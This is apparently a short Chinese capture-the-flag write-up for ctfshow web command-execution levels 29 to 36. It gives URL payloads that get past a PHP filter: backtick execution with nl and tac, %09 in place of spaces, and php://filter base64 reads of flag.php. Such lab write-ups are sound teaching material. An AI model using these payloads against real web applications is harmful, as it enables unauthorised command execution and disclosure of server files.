ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
全栈小51 分钟前
【C#】从一次异步锁逐渐展开浅谈服务器架构解决重复编码问题,我与AI的一次深度讨论得出的一些解决方案
服务器·架构·c#
安丘贾队长9 分钟前
json啊啊啊啊啊啊啊啊啊
运维
weixin_5377658011 分钟前
【负载均衡】LVS原理与配置
服务器·负载均衡·lvs
代码程序猿RIP12 分钟前
【Linux面经】OSI七层模型和TCP/IP四层体系结构
linux·网络·面试·面经
我什么都学不会15 分钟前
DNS主从服务器练习
linux·运维·服务器
zt1985q18 分钟前
外网访问项目研发管理软件 codes
运维·服务器·windows·网络协议·tcp/ip
华纳云IDC服务商19 分钟前
DNS记录更新后为什么还是访问不到新服务器?
运维·服务器
青靴39 分钟前
用 Docker Compose 管理留言板多容器应用
运维·docker·容器
涛声依旧393161 小时前
安装部署自己的nginx
运维·服务器·nginx
不会kao代码的小王1 小时前
零基础也能搭博客?
linux·windows·后端